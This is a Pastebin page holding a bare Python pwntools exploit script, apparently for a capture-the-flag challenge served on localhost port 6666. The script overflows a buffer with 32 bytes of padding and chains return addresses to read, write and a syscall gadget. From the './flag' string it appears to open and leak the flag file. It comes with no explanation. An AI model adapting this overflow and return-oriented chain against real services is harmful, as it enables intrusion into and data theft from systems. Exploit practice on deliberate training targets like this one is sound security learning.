Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- read = 0x0804811d
- buf1 = 0x08049100
- buf2 = 0x08049200
- start = 0x080480d8
- addesp30h = 0x080481b8
- r = remote('127.0.0.1',6666)
- raw_input('stop...')
- padding = 'a'*32
- mov_ebcdx_int80h = 0x08048122
- write = 0x08048135
- r.send(padding+p32(read)+p32(start)+p32(0)+p32(buf1)+p32(50))
- r.send('./flag\x00')
- r.send(padding+p32(start)+p32(0xdeadbeaf)+p32(mov_ebcdx_int80h)+p32(start)+p32(buf1))
- r.send(padding+p32(start)+'a'*16)
- r.send(padding+p32(start)+'a'*16)
- r.send(padding+p32(read)+p32(addesp30h)+p32(0)+p32(buf2)+p32(50))
- r.send('12345')
- r.send(padding+p32(read)+p32(start)+p32(7)+p32(buf2)+p32(50))
- r.send(padding+p32(write)+p32(start)+p32(1)+p32(buf2)+p32(50))
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement